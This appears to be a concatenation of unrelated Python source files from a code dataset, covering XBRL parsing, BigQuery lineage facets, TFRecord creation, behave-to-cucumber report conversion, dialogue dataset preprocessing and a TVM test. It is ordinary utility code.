typed = context[6]
label_extend, dimension_list_extend = explicit_list(explicit)
label_typed, label_typed_id, dimension_list_typed = typed_list(typed)
dimension_list = dimension_list_extend.append(dimension_list_typed)
if label_typed_id == '':
label_typed_id = None
return value, unit, decimals, startdate, enddate, lang,\
label_extend, label_typed, label_typed_id, dimension_list_extend
#schemaRef = (XBRL['{http://www.xbrl.org/2003/linkbase}schemaRef'])\
#['@{http://www.w3.org/1999/xlink}href']
dict54 = {}
for post in xbrldict:
if post not in ('{http://www.xbrl.org/2003/linkbase}s, xbrldict_to_xbrl_54chemaRef',
'@{http://www.w3.org/2001/XMLSchema-instance}schemaLocation'):
ref = post[:post.index('}')]
xbrlref = ref[(ref.rfind('/') - len(ref) + 1):]
if type(xbrldict[post]).__name__ == 'list':
for element in xbrldict[post]:
if element.get('context', 'missing') != 'missing':
value, unit, decimals, startdate, enddate, lang, label_extend,\
label_typed, label_typed_id, dimension_list = concept_data(element)
concept = xbrlref + ':' + get_xbrlkey(post, '}') + label_extend + label_typed
if type(unit).__name__ == 'NoneType':
unit = lang
nogle = (concept, startdate, enddate, label_typed_id, unit)
if nogle in dict54 and dict54[nogle][0] != value:
print('!!!!!!!!!', nogle, value, unit, decimals, dict54[nogle])
if len(str(dimension_list)) < 5:
dimension_list = None
dict54[nogle] = [value, unit, decimals, dimension_list]
if type(xbrldict[post]).__name__ == 'OrderedDict':
if (xbrldict[post]).get('context', 'missing') != 'missing':
value, unit, decimals, startdate, enddate, lang, label_extend, label_typed,\
label_typed_id, dimension_list = concept_data(xbrldict[post])
concept = xbrlref + ':' + get_xbrlkey(post, '}') + label_extend + label_typed
if type(unit).__name__ == 'NoneType':
unit = lang
nogle = (concept, startdate, enddate, label_typed_id, unit)
if nogle in dict54 and dict54[nogle][0] != value:
print('!!!!!!!!!', nogle, value, unit, decimals, dict54[nogle])
if len(str(dimension_list)) < 5:
dimension_list = None
dict54[nogle] = [value, unit, decimals, dimension_list]
if post in ('{http://www.xbrl.org/2003/linkbase}schemaRef',
'@{http://www.w3.org/2001/XMLSchema-instance}schemaLocation'):
dict54[post] = xbrldict[post]
return dict54
|
import database.src.language.insert.LanguageSource
import database.src.language.insert.Inserter
class Main(object):
def __init__(self, data, client):
self.__data = data
self.__client = client
self.__source = database.src.language.insert.LanguageSource.LanguageSource()
self.__inserter = database.src.language.insert.Inserter.Inserter(self.__data)
def Run(self):
self.__inserter.Insert(self.__source.Get())
if __name__ == "__main__":
m = Main()
m.Run()
|
#!/usr/bin/env python3
import sys
import random
import functools
HELP_MSG = """
Usage: tools/generate_test_data.py FROM_IDX END_IDX 'CALLBACK'
Examples:
> tools/generate_test_data.py 2 20 '\"{} {}\".format(i, \" \".join(list(map(str, range(3, i * 2)))))'
2 3
3 3 4 5
4 3 4 5 6 7
5 3 4 5 6 7 8 9
...
> tools/generate_test_data.py 0 200 '"{} {}".format(i, " ".join(map(str, random.sample(rng(200000), 10))))'
0 165071 69526 51919 146370 22430 179599 183854 171458 38744 62598
1 84871 61983 82583 196561 72424 161388 36854 109100 153300 199365
...
"""
@functools.lru_cache(maxsize=1000)
def rng(*args):
return list(range(*args))
def main(callback_str):
callback_str = "lambda i: " + callback_str
callback = eval(callback_str)
for i in range(start, end):
print(callback(i))
if __name__ == '__main__':
if len(sys.argv) < 4:
print(HELP_MSG)
else:
start = int(sys.argv[1])
end = int(sys.argv[2])
callback_str = sys.argv[3]
main(callback_str)
|
import csv
class csv_generator:
def __init__(self,):
# csv header
fieldnames = ['crypto', 'price','potential_yield']
self.dictionnary_list = []
while(True):
self.generate_dictionnary()
if input("Do you have more (Y)es or (N)o :") in ['N','n']:
break
with open('supports.csv', 'w', encoding='UTF8', newline='') as f:
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
writer.writerows(self.dictionnary_list)
def generate_dictionnary(self) -> None:
crypto = input("crypto :")
price = input("price :")
potential_yield = input("potential_yield in % :")
try:
self.dictionnary_list.append({'crypto': str(crypto),'price': float(price),'potential_yield': 1+float(potential_yield)/100})
except Exception as error:
print(f"Wrong input format {error}")
class csv_reader:
def __init__(self):
pass
def file_to_dict_list(self) -> list[dict]:
supports=[]
with open('supports.csv', newline='') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
supports.append(row)
return supports
if __name__=="__main__":
print(csv_reader().file_to_dict_list())
|
def domino_piling(m, n):
return (m * n) // 2
# Test cases:
print(domino_piling(3, 3))
print(domino_piling(2, 4))
|
from decimal import Decimal
from future.moves.urllib.parse import ParseResult
from collections import OrderedDict
from enum import Enum
from uuid import UUID
from datetime import date, datetime, time
from attr._compat import iteritems
from .functions import to_dict
from .types import (
TypedSequence, TypedMapping, TypedSet, DEFAULT_DATE_FORMAT,
DEFAULT_DATETIME_FORMAT, DEFAULT_TIME_FORMAT
)
@to_dict.register(list) # noqa F811
@to_dict.register(set)
@to_dict.register(tuple)
def _(obj, **kwargs):
suppress_empty_values = kwargs.get("suppress_empty_values", False)
retain_collection_types = kwargs.get("retain_collection_types", False)
if not suppress_empty_values or len(obj):
cf = obj.__class__ if retain_collection_types else list
return cf([to_dict(i, **kwargs) for i in obj])
@to_dict.register(dict) # noqa F811
def _(obj, **kwargs):
suppress_empty_values = kwargs.get("suppress_empty_values", False)
dict_factory = kwargs.get("dict_factory", OrderedDict)
items = []
for kk, vv in iteritems(obj):
vv = to_dict(vv, **kwargs)
if (not suppress_empty_values) or (vv is not None):
items.append((to_dict(kk, **kwargs), vv))
if not suppress_empty_values or len(items):
return dict_factory(items)
@to_dict.register(TypedSequence) # noqa F811
def _(obj, **kwargs):
return to_dict(obj.list, **kwargs)
@to_dict.register(TypedSet) # noqa F811
def _(obj, **kwargs):
return to_dict(obj.set, **kwargs)
@to_dict.register(TypedMapping) # noqa F811
def _(obj, **kwargs):
suppress_map_key_values = kwargs.get("suppress_map_key_values", False)
suppress_empty_values = kwargs.get("suppress_empty_values", False)
rv = kwargs.get("dict_factory", OrderedDict)()
items = obj.items()
for key_value, item in items:
sub_dict = to_dict(item, **kwargs)
if suppress_map_key_values:
sub_dict.pop(obj.key)
rv[key_value] = sub_dict
if not suppress_empty_values or len(items):
return rv
@to_dict.register(Enum) # noqa F811
def _(obj, **kwargs):
return obj.value
@to_dict.register(UUID) # noqa F811
def _(obj, **kwargs):
return str(obj)
@to_dict.register(ParseResult) # noqa F811
def _(obj, **kwargs):
return obj.geturl()
@to_dict.register(date) # noqa F811
def _(obj, **kwargs):
formatter = kwargs.get('formatter') or DEFAULT_DATE_FORMAT
return obj.strftime(formatter)
@to_dict.register(datetime) # noqa F811
def _(obj, **kwargs):
formatter = kwargs.get('formatter') or DEFAULT_DATETIME_FORMAT
return (obj.isoformat() if formatter == "ISO_FORMAT"
else obj.strftime(formatter))
@to_dict.register(time) # noqa F811
def _(obj, **kwargs):
formatter = kwargs.get('formatter') or DEFAULT_TIME_FORMAT
return obj.strftime(formatter)
@to_dict.register(Decimal) # noqa F811
def _(obj, **kwargs):
return str(obj)
|
# SPDX-License-Identifier: Apache-2.0.
import json
import logging
import traceback
import attr
from typing import Tuple, Optional, Dict, List
from google.cloud.bigquery import Client
from openlineage.common.dataset import Dataset, Source
from openlineage.common.models import DbTableSchema, DbColumn
from openlineage.common.schema import GITHUB_LOCATION
from openlineage.common.sql import DbTableMeta
from openlineage.common.utils import get_from_nullable_chain
from openlineage.client.facet import BaseFacet, OutputStatisticsOutputDatasetFacet, \
ExternalQueryRunFacet
_BIGQUERY_CONN_URL = 'bigquery'
@attr.s
class BigQueryErrorRunFacet(BaseFacet):
"""
Represents errors that can happen during execution of BigqueryExtractor
:param clientError: represents errors originating in bigquery client
:param parserError: represents errors that happened during parsing SQL provided to bigquery
"""
clientError: str = attr.ib(default=None)
parserError: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-error-run-facet.json"
@attr.s
class BigQueryJobRunFacet(BaseFacet):
"""
Facet that represents relevant statistics of bigquery run.
:param cached: bigquery caches query results. Rest of the statistics will not be provided
for cached queries.
:param billedBytes: how many bytes bigquery bills for.
:param properties: full property tree of bigquery run.
"""
cached: bool = attr.ib()
billedBytes: int = attr.ib(default=None)
properties: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-run-facet.json"
@attr.s
class BigQueryStatisticsDatasetFacet(BaseFacet):
"""
Facet that represents statistics of output dataset resulting from bigquery run.
:param outputRows: how many rows query produced.
:param size: size of output dataset in bytes.
"""
rowCount: int = attr.ib()
size: int = attr.ib()
def to_openlineage(self) -> OutputStatisticsOutputDatasetFacet:
return OutputStatisticsOutputDatasetFacet(
rowCount=self.rowCount,
size=self.size
)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-dataset-facet.json"
@attr.s
class BigQueryFacets:
run_facets: Dict[str, BaseFacet] = attr.ib()
inputs: List[Dataset] = attr.ib()
output: Optional[Dataset] = attr.ib(default=None)
class BigQueryDatasetsProvider:
def __init__(
self,
client: Optional[Client] = None,
logger: Optional[logging.Logger] = None
):
self.client = client
if client is None:
self.client = Client()
self.logger = logger
if logger is None:
self.logger = logging.getLogger(__name__)
def get_facets(self, job_id: str) -> BigQueryFacets:
inputs = []
output = None
run_facets = {}
try:
try:
job = self.client.get_job(job_id=job_id)
props = job._properties
run_stat_facet, dataset_stat_facet = self._get_output_statistics(props)
run_facets.update({
"bigQuery_job": run_stat_facet,
"externalQuery": ExternalQueryRunFacet(
externalQueryId=job_id, source="bigquery"
)
})
inputs = self._get_input_from_bq(props)
output = self._get_output_from_bq(props)
if output and dataset_stat_facet:
output.custom_facets.update({
"stats": dataset_stat_facet
})
output.output_facets.update({
'outputStatistics': dataset_stat_facet.to_openlineage()
})
finally:
# Ensure client has close() defined, otherwise ignore.
# NOTE: close() was introduced in python-bigquery v1.23.0
if hasattr(self.client, "close"):
self.client.close()
except Exception as e:
self.logger.error(
f"Cannot retrieve job details from BigQuery.Client. {e}",
exc_info=True
)
run_facets.update({
"bigQuery_error": BigQueryErrorRunFacet(
clientError=f"{e}: {traceback.format_exc()}",
)
})
return BigQueryFacets(run_facets, inputs, output)
def _get_output_statistics(self, properties) \
-> Tuple[BigQueryJobRunFacet, Optional[BigQueryStatisticsDatasetFacet]]:
stages = get_from_nullable_chain(properties, ['statistics', 'query', 'queryPlan'])
json_props = json.dumps(properties)
if not stages:
if get_from_nullable_chain(properties, ['statistics', 'query', 'statementType']) \
in ['CREATE_VIEW', 'CREATE_TABLE', 'ALTER_TABLE']:
return BigQueryJobRunFacet(cached=False), None
# we're probably getting cached results
if get_from_nullable_chain(properties, ['statistics', 'query', 'cacheHit']):
return BigQueryJobRunFacet(cached=True), None
if get_from_nullable_chain(properties, ['status', 'state']) != "DONE":
raise ValueError("Trying to extract data from running bigquery job")
raise ValueError(
f"BigQuery properties did not have required data: queryPlan - {json_props}"
)
out_stage = stages[-1]
out_rows = out_stage.get("recordsWritten", None)
out_bytes = out_stage.get("shuffleOutputBytes", None)
billed_bytes = get_from_nullable_chain(properties, [
'statistics', 'query', 'totalBytesBilled'
])
return BigQueryJobRunFacet(
cached=False,
billedBytes=int(billed_bytes) if billed_bytes else None,
properties=json_props
), BigQueryStatisticsDatasetFacet(
rowCount=int(out_rows),
size=int(out_bytes)
) if out_bytes and out_rows else None
def _get_input_from_bq(self, properties):
bq_input_tables = get_from_nullable_chain(properties, [
'statistics', 'query', 'referencedTables'
])
if not bq_input_tables:
return []
input_table_names = [
self._bq_table_name(bq_t) for bq_t in bq_input_tables
]
sources = [
self._source() for bq_t in bq_input_tables
]
try:
return [
Dataset.from_table_schema(
source=source,
table_schema=table_schema
)
for table_schema, source in zip(self._get_table_schemas(
input_table_names
), sources)
]
except Exception as e:
self.logger.warning(f'Could not extract schema from bigquery. {e}')
return [
Dataset.from_table(source, table)
for table, source in zip(input_table_names, sources)
]
def _get_output_from_bq(self, properties) -> Optional[Dataset]:
bq_output_table = get_from_nullable_chain(properties, [
'configuration', 'query', 'destinationTable'
])
if not bq_output_table:
return None
output_table_name = self._bq_table_name(bq_output_table)
source = self._source()
table_schema = self._get_table_safely(output_table_name)
if table_schema:
return Dataset.from_table_schema(
source=source,
table_schema=table_schema,
)
else:
self.logger.warning("Could not resolve output table from bq")
return Dataset.from_table(source, output_table_name)
def _get_table_safely(self, output_table_name):
try:
return self._get_table(output_table_name)
except Exception as e:
self.logger.warning(f'Could not extract output schema from bigquery. {e}')
return None
def _get_table_schemas(self, tables: [str]) \
-> [DbTableSchema]:
# Avoid querying BigQuery by returning an empty array
# if no tables have been provided.
if not tables:
return []
return [self._get_table(table) for table in tables]
def _get_table(self, table: str) -> Optional[DbTableSchema]:
bq_table = self.client.get_table(table)
if not bq_table._properties:
return
table = bq_table._properties
fields = get_from_nullable_chain(table, ['schema', 'fields'])
if not fields:
return
columns = [DbColumn(
name=fields[i].get('name'),
type=fields[i].get('type'),
description=fields[i].get('description'),
ordinal_position=i
) for i in range(len(fields))]
return DbTableSchema(
schema_name=table.get('tableReference').get('projectId') + '.' +
table.get('tableReference').get('datasetId'),
table_name=DbTableMeta(table.get('tableReference').get('tableId')),
columns=columns
)
def _source(self) -> Source:
return Source(
scheme='bigquery',
connection_url='bigquery'
)
def _bq_table_name(self, bq_table):
project = bq_table.get('projectId')
dataset = bq_table.get('datasetId')
table = bq_table.get('tableId')
return f"{project}.{dataset}.{table}"
|
'''
Usage
python tools/create-tfrecord.py train --data_dir=data/voc2012_raw/VOCdevkit/VOC2012/ \
--output_file=data/train.tfrecord \
--classes=data/voc2012.names
python tools/create-tfrecord.py --data_dir data/cervix/colpo \
--output_file data/colpo.tfrecord \
--classes data/cervix-colpo.names --log_level info
'''
import time
import os
import hashlib
import json
from os import listdir
from absl import app, flags, logging
from absl.flags import FLAGS
import tensorflow as tf
import tqdm
import skimage.io
flags.DEFINE_string('data_dir', './data/voc2012_raw/VOCdevkit/VOC2012/',
'path to raw PASCAL VOC dataset')
flags.DEFINE_string(
'output_file', './data/train.tfrecord', 'output dataset')
flags.DEFINE_string('classes', './data/voc2012.names', 'classes file')
flags.DEFINE_enum('log_level', 'info', [
'info', 'debug'], 'log_level mode; debug/info')
def _get_height_width(img_path):
image = skimage.io.imread(img_path)
height, width = image.shape[:2]
logging.debug('height, width: [%d %d]', height, width)
return height, width
def _get_bbox(coordinates, height, width):
xmin = 0.0
ymin = 0.0
xmax = 0.0
ymax = 0.0
if 0 == len(coordinates):
logging.warning('input coordinate size is zero')
else:
all_point_x = []
all_point_y = []
for set in coordinates:
for a in set:
all_point_x.append(int(a[0]))
all_point_y.append(int(a[1]))
xmin = float(min(all_point_x) / width)
ymin = float(min(all_point_y) / height)
xmax = float(max(all_point_x) / width)
ymax = float(max(all_point_y) / height)
logging.debug('bbox: [%f %f %f %f]', xmin, ymin, xmax, ymax)
return xmin, ymin, xmax, ymax
def build_example(type_, annotation, path, filename, img_format, class_map):
logging.debug('type: {}'.format(type_))
assert type_ in ["train", "val", "test"]
if img_format not in [".jpg", ".jpeg", ".png"]:
logging.warning("image(%s) is not supperted format(%s)",
filename, img_format)
return None
filename += img_format
img_path = os.path.join(path, filename)
img_raw = open(img_path, 'rb').read()
key = hashlib.sha256(img_raw).hexdigest()
height, width = _get_height_width(img_path)
xmin = []
ymin = []
xmax = []
ymax = []
classes = []
classes_text = []
if "test" == type_:
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),
'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),
'image/filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/source_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/key/sha256': tf.train.Feature(bytes_list=tf.train.BytesList(value=[key.encode('utf8')])),
'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw])),
'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_format.encode('utf8')])),
}))
else:
for obj in annotation:
if 'MultiPolygon' == obj['geometry']['type']:
logging.warning("Multi-polygon type")
return None
_xmin, _ymin, _xmax, _ymax = _get_bbox(obj['geometry']['coordinates'],
height, width)
xmin.append(_xmin)
ymin.append(_ymin)
xmax.append(_xmax)
ymax.append(_ymax)
if 'classification' in obj['properties']:
classes_text.append(obj['properties']['classification']['name']
.encode('utf8'))
classes.append(
class_map[obj['properties']['classification']['name']])
else:
classes_text.append(str('UNKNOWN').encode('utf8'))
classes.append(class_map['UNKNOWN'])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),
'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),
'image/filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/source_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/key/sha256': tf.train.Feature(bytes_list=tf.train.BytesList(value=[key.encode('utf8')])),
'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw])),
'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_format.encode('utf8')])),
'image/object/bbox/xmin': tf.train.Feature(float_list=tf.train.FloatList(value=xmin)),
'image/object/bbox/xmax': tf.train.Feature(float_list=tf.train.FloatList(value=xmax)),
'image/object/bbox/ymin': tf.train.Feature(float_list=tf.train.FloatList(value=ymin)),
'image/object/bbox/ymax': tf.train.Feature(float_list=tf.train.FloatList(value=ymax)),
'image/object/class/text': tf.train.Feature(bytes_list=tf.train.BytesList(value=classes_text)),
'image/object/class/label': tf.train.Feature(int64_list=tf.train.Int64List(value=classes)),
}))
return example
'''
def build_example(annotation, path, filename, img_format, class_map):
if img_format not in [".jpg", ".jpeg", ".png"]:
logging.warning("image(%s) is not supperted format(%s)",
filename, img_format)
return None
# img_path = os.path.join(FLAGS.data_dir, subset, filename)
filename += img_format
img_path = os.path.join(path, filename)
img_raw = open(img_path, 'rb').read()
key = hashlib.sha256(img_raw).hexdigest()
height, width = _get_height_width(img_path)
xmin = []
ymin = []
xmax = []
ymax = []
classes = []
classes_text = []
logging.debug("path: %s", path)
logging.debug("filename: %s", filename)
for obj in annotation:
if 'MultiPolygon' == obj['geometry']['type']:
logging.warning("Multi-polygon type")
return None
_xmin, _ymin, _xmax, _ymax = _get_bbox(obj['geometry']['coordinates'],
height, width)
xmin.append(_xmin)
ymin.append(_ymin)
xmax.append(_xmax)
ymax.append(_ymax)
if 'classification' in obj['properties']:
classes_text.append(obj['properties']['classification']['name']
.encode('utf8'))
classes.append(
class_map[obj['properties']['classification']['name']])
else:
classes_text.append(str('UNKNOWN').encode('utf8'))
classes.append(class_map['UNKNOWN'])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),
'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),
'image/filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/source_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/key/sha256': tf.train.Feature(bytes_list=tf.train.BytesList(value=[key.encode('utf8')])),
'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw])),
'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_format.encode('utf8')])),
'image/object/bbox/xmin': tf.train.Feature(float_list=tf.train.FloatList(value=xmin)),
'image/object/bbox/xmax': tf.train.Feature(float_list=tf.train.FloatList(value=xmax)),
'image/object/bbox/ymin': tf.train.Feature(float_list=tf.train.FloatList(value=ymin)),
'image/object/bbox/ymax': tf.train.Feature(float_list=tf.train.FloatList(value=ymax)),
'image/object/class/text': tf.train.Feature(bytes_list=tf.train.BytesList(value=classes_text)),
'image/object/class/label': tf.train.Feature(int64_list=tf.train.Int64List(value=classes)),
}))
return example
'''
def main(_argv):
logging.info("===== Start create tfrecord =====")
# log level
if 'debug' == FLAGS.log_level:
logging.set_verbosity(logging.DEBUG)
else:
logging.set_verbosity(logging.INFO)
# get class names
class_map = {name: idx for idx, name in enumerate(
open(FLAGS.classes).read().splitlines())}
logging.info("Class mapping loaded: %s", class_map)
# get IMAGE files
base_dir = os.path.abspath("./")
subset = ["train", "val", "test"]
out_name = os.path.splitext(FLAGS.output_file)[0]
out_format = os.path.splitext(FLAGS.output_file)[1]
for item in subset:
result_name = "{}-{}{}".format(out_name, item, out_format)
logging.info("output file: %s", result_name)
# open tfrecord file
writer = tf.io.TFRecordWriter(result_name)
dataset_dir = os.path.join(base_dir, FLAGS.data_dir, item)
logging.info("dataset path: %s", dataset_dir)
dataset_list = [f for f in listdir(dataset_dir)
if f.endswith(".jpg") or f.endswith(".png")]
logging.info("Image list loaded: %d", len(dataset_list))
logging.debug("Image list loaded: {}".format(dataset_list))
for name in tqdm.tqdm(dataset_list):
filename = os.path.splitext(name)[0]
img_format = os.path.splitext(name)[1]
if "test" == item:
annotation = None
else:
annotation = json.load(open(os.path.join(dataset_dir, (filename+'.json'))))
tf_example = build_example(item, annotation, dataset_dir, filename,
img_format, class_map)
if tf_example is not None:
writer.write(tf_example.SerializeToString())
writer.close()
logging.info("===== Done =====")
## report??
if __name__ == '__main__':
app.run(main)
|
'''
Copyright (c) 2016 Behalf Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
def convert(json_file, remove_background=False, duration_format=False, deduplicate=False, pretty_step_name=False):
# json_nodes are the scopes available in behave/cucumber json: Feature -> elements(Scnerios) -> Steps
json_nodes = ['feature', 'elements', 'steps']
# These fields doesn't exist in cucumber report, there-fore when converting from behave, we need to delete these
# fields.
fields_not_exist_in_cucumber_json = ['status', 'step_type']
def format_level(tree, index=0, id_counter=0):
for item in tree:
# Location in behave json translates to uri and line in cucumber json
uri, line_number = item.pop("location").split(":")
item["line"] = int(line_number)
for field in fields_not_exist_in_cucumber_json:
if field in item:
item.pop(field)
if 'tags' in item:
# Tags in behave are just a list of tag names, in cucumber every tag has a name and a line number.
item['tags'] = [{"name": tag if tag.startswith('@') else '@' + tag, "line": item["line"] - 1} for tag in
item['tags']]
if json_nodes[index] == 'steps':
if 'result' in item:
# Because several problems with long error messages the message sub-stringed to maximum 2000 chars.
if 'error_message' in item["result"]:
error_msg = item["result"].pop('error_message')
item["result"]["error_message"] = str(
(str(error_msg).replace("\"", "").replace("\\'", ""))[:2000])
if 'duration' in item["result"] and duration_format:
item["result"]["duration"] = int(item["result"]["duration"] * 1000000000)
else:
# In behave, skipped tests doesn't have result object in their json, there-fore when we generating
# Cucumber report for every skipped test we need to generated a new result with status skipped
item["result"] = {"status": "skipped", "duration": 0}
if 'table' in item:
item['rows'] = []
t_line = 1
item['rows'].append({"cells": item['table']['headings'], "line": item["line"] + t_line})
for table_row in item['table']['rows']:
t_line += 1
item['rows'].append({"cells": table_row, "line": item["line"] + t_line})
if pretty_step_name and 'match' in item:
item['match']['location'] = f"{item['name']} -> {item['match']['location']}"
else:
# uri is the name of the feature file the current item located
item["uri"] = uri
item["description"] = ""
item["id"] = id_counter
id_counter += 1
# If the scope is not "steps" proceed with the recursion
if index != 2 and json_nodes[index + 1] in item:
item[json_nodes[index + 1]] = format_level(
item[json_nodes[index + 1]], index + 1, id_counter=id_counter
)
return tree
# Option to remove background element because behave pushes it steps to all scenarios already
if remove_background:
for feature in json_file:
if feature['elements'][0]['type'] == 'background':
feature['elements'].pop(0)
if deduplicate:
def check_dupe(current_feature, current_scenario, previous_scenario):
if "autoretry" not in current_feature['tags'] and "autoretry" not in current_scenario['tags']:
return False
return \
previous_scenario['keyword'] == current_scenario['keyword'] and \
previous_scenario['location'] == current_scenario['location'] and \
previous_scenario['name'] == current_scenario['name'] and \
previous_scenario['tags'] == current_scenario['tags'] and \
previous_scenario['type'] == current_scenario['type']
for feature in json_file:
# Create a working list
scenarios = []
# For each scenario in the feature
for scenario in feature['elements']:
# Append the scenario to the working list
scenarios.append(scenario)
# Check the previous scenario
try:
# See if the previous scenario exists and matches
previous_scenario = scenarios[-2]
if check_dupe(feature, scenario, previous_scenario):
# Remove the earlier scenario from the working list
scenarios.pop(-2)
except IndexError:
# If we're at the beginning of the list, don't do anything
pass
# Replace the existing list with the working list
feature['elements'] = scenarios
# Begin the recursion
return format_level(json_file)
|
import json
import os
import argparse
from collections import defaultdict
from datasets import load_dataset
DOC_DOMAIN_SPLIT = "train"
YOUR_DATASETS_SOURCE_DIR = "" # the root folder of your local `datasets` source code.
END_TOKENS = ['.', '!', '?', '...', "'", "`", '"', ")"] # acceptable ways to end a sentence
def fix_missing_period(line):
"""Adds a period to a line that is missing a period"""
if line == "": return line
if line[-1] in END_TOKENS: return line
return line + " ."
def text2line(text):
return text.replace("\n", "").replace("\r", "").strip()
def _parse_knowledge(kns:list, correct_first:bool, ground_id:list):
# we wish the knowledge sentences to keep their original order
# # we want the correct knowledge to always be in index 0
# # there could be multiple references
ground_id.sort()
if correct_first:
anchor = 0
for i in ground_id:
i = int(i) - 1
kns[anchor], kns[i] = kns[i], kns[anchor]
anchor += 1
return kns
def load_dataset_from_file(filename):
# read the data file
with open(filename, "r") as f:
data = json.load(f)
dial_dataset = []
for _, domain_data in data.items():
for _, v in domain_data.items():
dial_dataset.extend(v)
return dial_dataset
def load_doc2dial_seq2seq(args, correct_first=False, keep_last_n=2, grounding=False):
doc_dataset = load_dataset("../dialdoc", name="document_domain", split=DOC_DOMAIN_SPLIT) # path to your datasets source code
if args.split == "testdev" or args.split == "test":
dial_dataset = load_dataset_from_file(args.in_file)
else:
dial_dataset = load_dataset( "../dialdoc", name="dialogue_domain", split=args.split, ignore_verifications=True)
d_doc = {}
d_doc_span = {}
for ex in doc_dataset:
d_doc[ex["doc_id"]] = []
d_doc_span[ex["doc_id"]] = {}
for d_span in ex["spans"]:
# id: d_span["id_sp"]
d_doc_span[ex["doc_id"]][d_span["id_sp"]] = d_span["text_sp"].replace("\n", "")
d_doc[ex["doc_id"]].append(d_span["text_sp"].replace("\n", ""))
for ex in dial_dataset:
history_strings = []
users = []
for i, turn in enumerate(ex["turns"]):
if not turn.get("references", None): # this task only uses instances and evalutes on the grounded turns.
if "test" not in args.split:
continue
else: # current we are in the test set and reference is missing by default
turn["references"] = [{"sp_id":0}]
ground_id = []
for ref in turn["references"]:
ground_id.append(ref["sp_id"])
utterance = fix_missing_period(text2line(turn["utterance"]))
if turn["role"] == "agent":
users.append(1)
elif turn["role"] == "user":
users.append(0)
else:
raise ValueError("Invalid role!")
history_strings.append(utterance)
if turn["role"] == "agent" and "test" not in args.split:
knowledge = _parse_knowledge(d_doc[ex["doc_id"]], correct_first, ground_id)
label = utterance
yield (history_strings[-(keep_last_n+1):-1], users[-(keep_last_n+1):-1], label, knowledge)
if "test" in args.split:
knowledge = _parse_knowledge(d_doc[ex["doc_id"]], correct_first, ground_id)
_id = ex["dial_id"] + "_" + str(turn["turn_id"])
yield (history_strings[-keep_last_n:], users[-keep_last_n:], _id, knowledge)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Pre-training for Knowledge-Grounded Conversation'
)
parser.add_argument('--in_file', type=str, default='')
parser.add_argument('--out_file', type=str, default='')
parser.add_argument(
"--split",
type=str,
required=True,
help="Data split is 'train', 'validation' or 'test'",
)
args = parser.parse_args()
with open(args.out_file, 'w', encoding='utf-8') as f:
for history, user, response, knowledge in load_doc2dial_seq2seq(args, correct_first=True, keep_last_n=2):
f.write(
json.dumps({
'history': history,
'user': user,
'response': response,
'knowledge': knowledge
}) + '\n'
)
|
import tvm
def test_rewrite_Select():
ib = tvm.ir_builder.create()
A = ib.allocate("float32", 100, name="A", scope="global")
i = tvm.var("i")
y = tvm.expr.Select(i > 1, A[i-1], 1.0)
yy = tvm.ir_pass.RewriteUnsafeSelect(tvm.make.Evaluate(y)).value
z = tvm.expr.Select(
tvm.expr.Select(i > 1, A[i-1], 1.0) > 0.0, A[i], 0.1)
zz = tvm.ir_pass.RewriteUnsafeSelect(tvm.make.Evaluate(z)).value
a = tvm.expr.Select(i>10, y, z)
aa = tvm.ir_pass.RewriteUnsafeSelect(tvm.make.Evaluate(a)).value
assert yy.name == "tvm_if_then_else"
assert zz.name == "tvm_if_then_else"
assert isinstance(aa, tvm.expr.Select)
if __name__ == "__main__":
test_rewrite_Select()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.